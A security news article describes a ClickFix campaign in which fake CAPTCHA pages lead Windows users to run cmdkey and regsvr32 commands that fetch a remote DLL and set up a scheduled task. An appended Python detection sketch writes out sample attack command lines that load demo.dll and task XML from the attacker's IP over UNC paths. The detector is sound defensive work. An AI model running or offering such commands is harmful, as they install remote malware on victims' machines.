New ClickFix attack Hides in Native Windows Tools to Reduce Detection Risk
ClickFix campaign uses fake CAPTCHA to trick Windows users into running malicious commands via cmdkey and regsvr32.
Summary
A new ClickFix social engineering campaign discovered by CyberProof tricks users into executing malicious commands through fake CAPTCHA pages, leveraging native Windows tools (cmdkey and regsvr32) to maintain persistence and evade detection. The attack chains multiple actions to fetch a malicious DLL (demo.dll) from a remote server, which establishes scheduled tasks retrieving instructions from a remote XML file. By using trusted Windows binaries (LOLBins) and avoiding obvious malware detection signatures, attackers achieve high stealth while maintaining execution reliability.
Full text
By Deeba Ahmed, April 24, 2026

A new ClickFix attack campaign uses fake CAPTCHA pages to trick users into running malicious commands. Learn how hackers use cmdkey and regsvr32 to maintain persistence and evade detection on Windows systems.

CyberProof Threat Research Team has found a new campaign where hackers are compromising Windows computers using the ClickFix method. This technique is not new, but it is becoming much more common. Hackers have used similar ClickFix lures to impersonate Google Meet, Microsoft Word, and even GitHub to trick people into running malicious code. Hackread.com has been consistently reporting the growing involvement of this technique in attacks, as scammers find it to be a very reliable way to bypass advanced security tools. This latest version of the scam was found by CyberProof in April 2026.

The CAPTCHA Trick

The social engineering-based attack generally starts with a fake CAPTCHA-like security check or a browser error, which informs the user that to fix the issue, they must press the Windows key and R (Win + R) and paste a specific command.

According to CyberProof, this attack version is different because it avoids common tools like PowerShell or rundll32, which security software can easily spot, and instead uses two other native Windows utilities: cmdkey and regsvr32. Using these LOLBins (trusted Windows binaries already present on the computer), the hackers can operate without alerting the user. And, since the user starts the process manually, security tooling tends to treat the activity as legitimate user action. The malicious command even includes a fake ‘I am not a robot’ comment to make the code look like a real Cloudflare security check.
Using Hidden Files

When this command is pasted, it quickly connects to a server at the IP address 151.245.195.142 using a UNC path. From there, it fetches a file named demo.dll. This is a 64-bit Windows DLL designed to run silently. It uses a function called DllRegisterServer to launch a hidden CreateProcessA call, which then sets up a scheduled task on the computer so the hackers can maintain persistence. The attackers named this task RunNotepadNow to make it appear as a boring, everyday background process. Another interesting part is that the task instructions are not even kept on the computer, but retrieved from a remote file called 777.xml.

Researchers noted that by using these trusted tools, the attacker “achieves a high degree of stealth while maintaining execution reliability.”

“In this campaign, victims are socially engineered into executing a single malicious command via the Windows Run dialog (Win + R). That command chains multiple actions to stage credentials, retrieve a remote DLL, and execute it silently. By relying exclusively on trusted Windows components and avoiding obvious malware drops, the attacker achieves a high degree of stealth while maintaining execution reliability,” the report reads.

(Credit: CyberProof)

Why is it Hard to Catch

Hackers have stored that XML file on their own servers. This allows them to change instructions whenever they want without sending a new file to update the attack. Researchers stated that at the time of publishing this research, the server at 151.245.195.142 was already down, making it hard to identify exactly what the hackers were planning to do next.

CyberProof researchers suggest the best way to stay safe is to never copy-paste code from a website into your computer’s Run box, no matter how real the CAPTCHA looks.
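A detection sketch for the chain the article describes, added here and not code from CyberProof or Hackread: it runs three rules over constructed Sysmon-style process-creation records and flags regsvr32 loading a DLL from a UNC path, cmdkey launched under explorer.exe (where a Win+R command runs), and a scheduled task created from a UNC-hosted XML. The share name, the exact command arguments, the schtasks /xml import and the explorer.exe parent heuristic are assumptions; the IP, DLL, XML and task names are the ones the article reports.

```python
"""Detection sketch for the ClickFix chain described above (added example, not
CyberProof's or Hackread's code). Scans constructed process-creation records
shaped like Sysmon Event ID 1 fields for the LOLBin patterns the article names."""
import re
from dataclasses import dataclass

# Matches \\host\share\... (UNC); the campaign used a bare IP as the host.
UNC = re.compile(r"\\\\[\w.\-]+\\\S+")


@dataclass
class ProcEvent:
    image: str    # full path of the new process
    cmdline: str  # its command line
    parent: str   # full path of the parent process


def exe(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def classify(ev: ProcEvent) -> list[str]:
    """Return the rule names the event matches (empty when nothing fires)."""
    hits, name, parent = [], exe(ev.image), exe(ev.parent)
    unc = UNC.search(ev.cmdline) is not None
    if name == "regsvr32.exe" and unc:
        hits.append("regsvr32_unc_dll")         # DllRegisterServer on a remote DLL
    if name == "cmdkey.exe" and parent == "explorer.exe":
        hits.append("cmdkey_from_run_dialog")  # Win+R launches under explorer.exe
    if name == "schtasks.exe" and "/xml" in ev.cmdline.lower() and unc:
        hits.append("schtasks_remote_xml")     # assumption: task imported via /xml
    return hits


def scan(events: list[ProcEvent]) -> list[tuple[str, str]]:
    """Flatten (rule, command line) pairs for every suspicious event."""
    return [(rule, ev.cmdline) for ev in events for rule in classify(ev)]


# Constructed sample events; IP, DLL, XML and task names are the ones the
# article reports, the share name and the exact arguments are placeholders.
SYS32 = r"C:\Windows\System32"
SAMPLE = [
    ProcEvent(SYS32 + r"\cmdkey.exe", "cmdkey /add:151.245.195.142 [credential args redacted]", r"C:\Windows\explorer.exe"),
    ProcEvent(SYS32 + r"\regsvr32.exe", r"regsvr32 /s \\151.245.195.142\share\demo.dll", r"C:\Windows\explorer.exe"),
    ProcEvent(SYS32 + r"\schtasks.exe", r"schtasks /create /tn RunNotepadNow /xml \\151.245.195.142\share\777.xml", SYS32 + r"\regsvr32.exe"),
    ProcEvent(SYS32 + r"\regsvr32.exe", r"regsvr32 /s C:\Program Files\Vendor\plugin.dll", SYS32 + r"\msiexec.exe"),  # benign
    ProcEvent(SYS32 + r"\cmdkey.exe", "cmdkey /list", SYS32 + r"\cmd.exe"),  # benign
]

if __name__ == "__main__":
    for rule, cmd in scan(SAMPLE):
        print(f"{rule}: {cmd}")
```

The three rules are independent, so a single regsvr32-from-UNC hit is worth triage on its own, while all three firing on one host in sequence is the full chain.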
Indicators of Compromise
- ip — 151.245.195.142
- malware — demo.dll
- malware — ClickFix